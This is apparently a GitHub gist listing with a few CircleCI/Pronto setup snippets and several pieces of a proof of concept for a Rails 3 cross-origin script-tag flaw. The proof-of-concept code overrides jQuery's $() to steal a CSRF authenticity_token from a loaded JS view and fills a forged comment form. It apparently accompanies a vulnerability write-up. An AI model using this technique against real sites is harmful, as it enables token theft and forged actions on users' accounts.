Maksim Abramchuk MaksimAbramchuk
MaksimAbramchuk
/ circleci_rubocop_tutorial_snippet_3.sh
Created
January 19, 2016 22:48
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| export GITHUB_ACCESS_TOKEN=<your_github_access_token> | |
| export PULL_REQUEST_URL=${CI_PULL_REQUEST} | |
| export PULL_REQUEST_ID=`echo $PULL_REQUEST_URL | grep -o -E ‘[0–9]+$’ | head -1 | sed -e ‘s/^0\+//’` | |
| ((bin/bundle exec pronto run -f github_pr -c origin/master)) || true |
MaksimAbramchuk
/ circleci_rubocop_tutorial_snippet_2.yml
Created
January 19, 2016 22:47
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| dependencies: | |
| post: | |
| — bin/cisetup | |
| checkout: | |
| post: | |
| — git fetch origin — depth=1000000 |
MaksimAbramchuk
/ circleci_rubocop_tutorial_snippet_1.sh
Created
January 19, 2016 22:46
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $PULL_REQUEST_URL | grep -o -E ‘[0–9]+$’ | head -1 | sed -e ‘s/^0\+//’ |
MaksimAbramchuk
/ code_7.js
Created
January 19, 2016 17:39
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| document.addEventListener(‘DOMContentLoaded’, function () { document.getElementById(‘token’).value = token; }, false); |
MaksimAbramchuk
/ code_6.js
Created
January 19, 2016 17:37
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| getSecureInfo = function (html) { | |
| matches = html.match(/name=”authenticity_token” type=”hidden” value=”(.*)”/); | |
| token = matches[1]; | |
| document.getElementById(‘token’).value = token; | |
| }; |
MaksimAbramchuk
/ code_5.js
Created
January 19, 2016 17:35
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| document.write(‘<script src=”http://example.com/users/maximabramchuk/books/new.js"></script>'); |
MaksimAbramchuk
/ code_4.js
Created
January 19, 2016 17:33
https://medium.com/@MaximAbramchuk/about-rails-3-cross-origin-script-tag-vulnerability
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function $() { | |
| return { | |
| after: getSecureInfo | |
| } | |
| }; |
MaksimAbramchuk
/ code_3.js
Created
January 19, 2016 17:32
https://medium.com/@MaximAbramchuk/about-rails-3-cross-origin-script-tag-vulnerability
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var _document = document; | |
| var token = ‘’; | |
| getSecureInfo = function (html) { | |
| matches = html.match(/name=”authenticity_token” type=”hidden” value=”(.*)”/); | |
| token = matches[1]; | |
| document.getElementById(‘token’).value = token; | |
| }; | |
| function $() { |
MaksimAbramchuk
/ code_1.js
Created
January 19, 2016 17:30
https://medium.com/@MaximAbramchuk/about-rails-3-cross-origin-script-tag-vulnerability_form_1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $(“.wrapper.dev”).after(“<%= escape_javascript(render(:partial => @partial))%>”) |
MaksimAbramchuk
/ code_2.html
Last active
January 19, 2016 17:30
https://medium.com/@MaximAbramchuk/about-rails-3-cross-origin-script-tag-vulnerability_form_1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <script type=”text/javascript” src=”index.js”></script> | |
| <title>JS views are vulnerable</title> | |
| </head> | |
| <body> | |
| <form action=”http://example.com/comments" method=”POST”> | |
| <input id=”token” type=”hidden” name=”authenticity_token” value=””> | |
| <input type=”hidden” name=”comment[model_id]” value=”76678"> | |
| <input type=”hidden” name=”comment[body]” value=”I’m a cool hacker!”> |